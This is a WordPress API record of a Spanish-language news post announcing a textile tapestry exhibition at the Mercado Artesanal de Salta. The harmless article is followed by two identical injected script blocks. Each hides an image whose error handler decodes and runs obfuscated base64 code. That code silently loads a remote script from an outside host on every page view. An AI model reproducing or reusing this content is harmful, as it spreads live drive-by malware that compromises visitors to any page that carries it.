{"id":1550,"date":"2022-09-27T12:51:48","date_gmt":"2022-09-27T15:51:48","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=1550"},"modified":"2025-08-14T00:34:23","modified_gmt":"2025-08-14T03:34:23","slug":"artistas-textiles-exponen-tapices-en-el-mercado-artesanal-de-salta","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=1550","title":{"rendered":"Artistas textiles exponen tapices en el Mercado Artesanal de Salta"},"content":{"rendered":"\n<h3 class=\"has-cyan-bluish-gray-color has-text-color has-background wp-block-heading\" style=\"background-color:#a7072f\"><em>Con entrada gratuita, hasta el 30 de septiembre se presenta la muestra \u201cDe mi tierra: Puntos y nudos\u201d que busca resaltar paisajes emblem\u00e1ticos de la Provincia.<\/em><\/h3>\n\n\n\n<p>Con el apoyo de la Secretar\u00eda de Cultura de la Provincia, GaVi Arte Textil expone&nbsp;tapices de su autor\u00eda en la muestra \u201cDe mi tierra: Puntos y nudos\u201d con la intenci\u00f3n de difundir la cultura e identidad salte\u00f1a a trav\u00e9s del dise\u00f1o.<\/p>\n\n\n\n<p>La muestra de tapices&nbsp;estar\u00e1 abierta al p\u00fablico hasta el 30 de septiembre de 10 a 20:30 horas en el hall de ingreso del Mercado Artesanal de Salta, Av. San Mart\u00edn 2555, con entrada gratuita.<\/p>\n\n\n\n<p>GaVi Arte Textil, es la fusi\u00f3n de los emprendimientos Tejido Bonito de Gabriela Pernas y Vivigurumi de Viviana Montelongo, para realizar telares que representan la cultura, los saberes e identidad salte\u00f1a, desplegando la creatividad para el dise\u00f1o de piezas \u00fanicas.<\/p>\n\n\n\n<p>Las artistas trabajan dise\u00f1os aut\u00f3ctonos y de arte abstracto en telar, bastidor, crochet, t\u00e9cnicas contempor\u00e1neas como el latch hook de Inglaterra, la japonesa de amigurumi y el macram\u00e9 de Francia.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/artistas-textiles-exponen-tapices-en-el-mercado-artesanal-de-salta-84622\" target=\"_blank\" rel=\"noopener\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Con entrada gratuita, hasta el 30 de septiembre se presenta la muestra \u201cDe mi tierra: Puntos y nudos\u201d que busca resaltar paisajes emblem\u00e1ticos de la Provincia. Con el apoyo de la Secretar\u00eda de Cultura de la Provincia, GaVi Arte Textil expone&nbsp;tapices de su autor\u00eda en la muestra \u201cDe mi tierra: Puntos y nudos\u201d con la [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1551,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[26],"tags":[],"class_list":{"0":"post-1550","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-culturales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1550"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1550"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1550\/revisions"}],"predecessor-version":[{"id":7335,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1550\/revisions\/7335"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/1551"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1550"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1550"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1550"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}